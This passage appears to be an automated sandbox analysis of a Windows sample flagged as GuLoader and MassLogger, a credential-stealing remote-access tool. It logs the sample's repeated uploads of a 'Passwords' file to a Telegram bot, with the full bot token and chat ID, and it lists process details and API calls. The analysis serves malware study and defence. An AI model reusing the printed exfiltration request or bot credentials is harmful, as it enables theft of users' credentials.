2025-01-10 20:54:40 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 35 34 64 36 39 38 35 66 66 34 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd354d6985ff47Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:54:41 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:54:41 GMT Content-Type: application/json Content-Length: 536 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:54:41 UTC	536	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 36 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 38 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44765,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542481,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	50058	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:54:42 UTC	296	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd358e0f65a80c Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 20:54:42 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 35 38 65 30 66 36 35 61 38 30 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd358e0f65a80cContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:54:43 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:54:43 GMT Content-Type: application/json Content-Length: 536 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:54:43 UTC	536	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 36 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 38 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44766,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542483,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	50060	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:54:44 UTC	296	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd35cc02b4df6f Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 20:54:44 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 35 63 63 30 32 62 34 64 66 36 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd35cc02b4df6fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:54:44 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:54:44 GMT Content-Type: application/json Content-Length: 536 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:54:44 UTC	536	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 36 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 38 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44767,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542484,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	50062	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:54:46 UTC	296	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd362136d2c0db Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 20:54:46 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 36 32 31 33 36 64 32 63 30 64 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd362136d2c0dbContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:54:46 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:54:46 GMT Content-Type: application/json Content-Length: 536 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:54:46 UTC	536	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 36 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 38 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44768,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542486,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	50064	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:54:50 UTC	296	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd36827099b96e Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 20:54:50 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 36 38 32 37 30 39 39 62 39 36 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd36827099b96eContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:54:50 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:54:50 GMT Content-Type: application/json Content-Length: 536 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:54:50 UTC	536	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 36 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 39 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44769,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542490,"document":{"file_name":"U

Target ID:	0
Start time:	15:52:42
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\2CQ2zMn0hb.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\2CQ2zMn0hb.exe"
Imagebase:	0x400000
File size:	1'052'225 bytes
MD5 hash:	57A8326258E722638FDFAB7715E94356
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2380434486.00000000032B8000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	15:53:15
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\2CQ2zMn0hb.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\2CQ2zMn0hb.exe"
Imagebase:	0x400000
File size:	1'052'225 bytes
MD5 hash:	57A8326258E722638FDFAB7715E94356
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.3306564434.000000003491B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3306564434.000000003491B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.3306564434.000000003491B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	19.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	19.8%
Total number of Nodes:	1592
Total number of Limit Nodes:	39

Executed Functions

Function 004034A5 Relevance: 80.9, APIs: 32, Strings: 14, Instructions: 410
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 004034C8
GetVersion.KERNEL32 ref: 004034CE
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
OleInitialize.OLE32(00000000), ref: 00403545
SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 004035AE

Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004036E8
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403705
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403719
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403721
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403732
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040373A
DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040374E

Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5

OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
ExitProcess.KERNEL32 ref: 0040383A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00436800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040388F
DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
CopyFileW.KERNEL32(C:\Users\user\Desktop\2CQ2zMn0hb.exe,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038FD
CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
OpenProcessToken.ADVAPI32(00000000), ref: 00403960
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
AdjustTokenPrivileges.ADVAPI32 ref: 00403998
ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
ExitProcess.KERNEL32 ref: 004039E0

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004036DD, 004036E2, 004036F8, 00403704, 00403713, 00403720, 0040372C, 00403734, 0040384A, 0040385B, 00403866, 00403872, 0040387F, 0040388E, 0040393F
.tmp, xrefs: 00403861
Error launching installer, xrefs: 004037D0
\Temp, xrefs: 004036FF
~nsu, xrefs: 00403845
TEMP, xrefs: 0040372D
C:\Users\user\Desktop\2CQ2zMn0hb.exe, xrefs: 004038F8
UXTHEME, xrefs: 004034F5, 004034FA, 00403500
Low, xrefs: 0040371B
1033, xrefs: 00403749
NSIS Error, xrefs: 00403567
SeShutdownPrivilege, xrefs: 0040396F
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004034BC
TMP, xrefs: 00403735

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\2CQ2zMn0hb.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3441113951-323385493
Opcode ID: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
Opcode Fuzzy Hash: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E

Function 00404DCC Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404DE4
GetDlgItem.USER32(?,00000408), ref: 00404DEF
GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
LoadBitmapW.USER32(0000006E), ref: 00404E4C
SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
DeleteObject.GDI32(00000000), ref: 00404EC2
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
ShowWindow.USER32(?,00000005), ref: 0040501C
SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
ImageList_Destroy.COMCTL32(?), ref: 004051EC
GlobalFree.KERNEL32(?), ref: 004051FC
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
ShowWindow.USER32(?,00000000), ref: 0040539B
